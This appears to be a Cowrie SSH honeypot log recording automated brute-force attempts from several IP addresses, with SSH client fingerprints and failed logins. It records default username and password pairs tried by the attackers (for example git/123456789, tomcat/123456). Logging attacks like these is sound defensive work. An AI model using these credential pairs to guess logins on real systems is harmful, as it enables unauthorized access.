{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:12:30.471246Z","src_ip":"41.226.27.251","session":"11edb7e8a959"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:12:30.499230Z","src_ip":"41.226.27.251","session":"11edb7e8a959"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:30.695700Z","src_ip":"41.226.27.251","session":"11edb7e8a959"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:12:31.864196Z","src_ip":"41.226.27.251","session":"11edb7e8a959"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43074,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d21e92c9763","protocol":"ssh","message":"New connection: 212.227.125.160:43074 (1.2.3.4:22) [session: 8d21e92c9763]","sensor":"my-vps","timestamp":"2025-08-31T03:12:34.658691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:12:35.122331Z","src_ip":"212.227.125.160","session":"8d21e92c9763"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:12:35.123111Z","src_ip":"212.227.125.160","session":"8d21e92c9763"}
{"eventid":"cowrie.login.failed","username":"git","password":"12345678","message":"login attempt [git/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:38.330846Z","src_ip":"212.227.125.160","session":"8d21e92c9763"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:12:39.850062Z","src_ip":"212.227.125.160","session":"8d21e92c9763"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51530,"dst_ip":"1.2.3.4","dst_port":22,"session":"90a53ba8f0cc","protocol":"ssh","message":"New connection: 212.227.125.160:51530 (1.2.3.4:22) [session: 90a53ba8f0cc]","sensor":"my-vps","timestamp":"2025-08-31T03:12:41.845266Z"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:44.788821Z","src_ip":"212.227.235.229","session":"972029ce18c0"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55416,"dst_ip":"1.2.3.4","dst_port":22,"session":"31fd79e41bdc","protocol":"ssh","message":"New connection: 41.226.27.251:55416 (1.2.3.4:22) [session: 31fd79e41bdc]","sensor":"my-vps","timestamp":"2025-08-31T03:12:50.438370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:12:50.492845Z","src_ip":"41.226.27.251","session":"31fd79e41bdc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:12:50.493876Z","src_ip":"41.226.27.251","session":"31fd79e41bdc"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:50.686822Z","src_ip":"41.226.27.251","session":"31fd79e41bdc"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:12:51.873245Z","src_ip":"41.226.27.251","session":"31fd79e41bdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41580,"dst_ip":"1.2.3.4","dst_port":22,"session":"fea20169faff","protocol":"ssh","message":"New connection: 212.227.125.160:41580 (1.2.3.4:22) [session: fea20169faff]","sensor":"my-vps","timestamp":"2025-08-31T03:13:01.023944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:13:01.025563Z","src_ip":"212.227.125.160","session":"fea20169faff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:13:01.277591Z","src_ip":"212.227.125.160","session":"fea20169faff"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"admin","message":"login attempt [infocare/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:02.323408Z","src_ip":"212.227.125.160","session":"fea20169faff"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:03.575333Z","src_ip":"212.227.125.160","session":"fea20169faff"}
{"eventid":"cowrie.session.closed","duration":"27.2","message":"Connection lost after 27.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:09.092822Z","src_ip":"212.227.125.160","session":"90a53ba8f0cc"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fb32b0068bc","protocol":"ssh","message":"New connection: 41.226.27.251:48900 (1.2.3.4:22) [session: 9fb32b0068bc]","sensor":"my-vps","timestamp":"2025-08-31T03:13:10.768730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:13:10.837554Z","src_ip":"41.226.27.251","session":"9fb32b0068bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:13:10.838350Z","src_ip":"41.226.27.251","session":"9fb32b0068bc"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:11.012697Z","src_ip":"41.226.27.251","session":"9fb32b0068bc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:12.261452Z","src_ip":"41.226.27.251","session":"9fb32b0068bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32870,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1d33728aa67","protocol":"ssh","message":"New connection: 212.227.235.229:32870 (1.2.3.4:22) [session: e1d33728aa67]","sensor":"my-vps","timestamp":"2025-08-31T03:13:13.326981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:13:14.083973Z","src_ip":"212.227.235.229","session":"e1d33728aa67"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:13:14.084847Z","src_ip":"212.227.235.229","session":"e1d33728aa67"}
{"eventid":"cowrie.session.closed","duration":"68.6","message":"Connection lost after 68.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:14.349549Z","src_ip":"212.227.235.229","session":"972029ce18c0"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456789","message":"login attempt [git/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:20.189733Z","src_ip":"212.227.235.229","session":"e1d33728aa67"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:22.047109Z","src_ip":"212.227.235.229","session":"e1d33728aa67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58420,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c840d3984a7","protocol":"ssh","message":"New connection: 212.227.235.229:58420 (1.2.3.4:22) [session: 6c840d3984a7]","sensor":"my-vps","timestamp":"2025-08-31T03:13:23.159475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:13:25.988140Z","src_ip":"212.227.235.229","session":"6c840d3984a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:13:25.989157Z","src_ip":"212.227.235.229","session":"6c840d3984a7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44848,"dst_ip":"1.2.3.4","dst_port":22,"session":"b61087c2ca62","protocol":"ssh","message":"New connection: 41.226.27.251:44848 (1.2.3.4:22) [session: b61087c2ca62]","sensor":"my-vps","timestamp":"2025-08-31T03:13:30.867156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:13:30.868753Z","src_ip":"41.226.27.251","session":"b61087c2ca62"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:13:30.913955Z","src_ip":"41.226.27.251","session":"b61087c2ca62"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:31.051310Z","src_ip":"41.226.27.251","session":"b61087c2ca62"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:32.445266Z","src_ip":"41.226.27.251","session":"b61087c2ca62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51254,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb5ff3bec258","protocol":"ssh","message":"New connection: 212.227.125.160:51254 (1.2.3.4:22) [session: cb5ff3bec258]","sensor":"my-vps","timestamp":"2025-08-31T03:13:35.050508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:13:35.448325Z","src_ip":"212.227.125.160","session":"cb5ff3bec258"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:13:35.449137Z","src_ip":"212.227.125.160","session":"cb5ff3bec258"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456789","message":"login attempt [git/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:37.554303Z","src_ip":"212.227.125.160","session":"cb5ff3bec258"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:39.158607Z","src_ip":"212.227.125.160","session":"cb5ff3bec258"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:40.793537Z","src_ip":"212.227.235.229","session":"6c840d3984a7"}
{"eventid":"cowrie.session.closed","duration":"25.2","message":"Connection lost after 25.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:48.405451Z","src_ip":"212.227.235.229","session":"6c840d3984a7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52868,"dst_ip":"1.2.3.4","dst_port":22,"session":"d81dd7929576","protocol":"ssh","message":"New connection: 41.226.27.251:52868 (1.2.3.4:22) [session: d81dd7929576]","sensor":"my-vps","timestamp":"2025-08-31T03:13:51.118346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:13:51.142585Z","src_ip":"41.226.27.251","session":"d81dd7929576"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 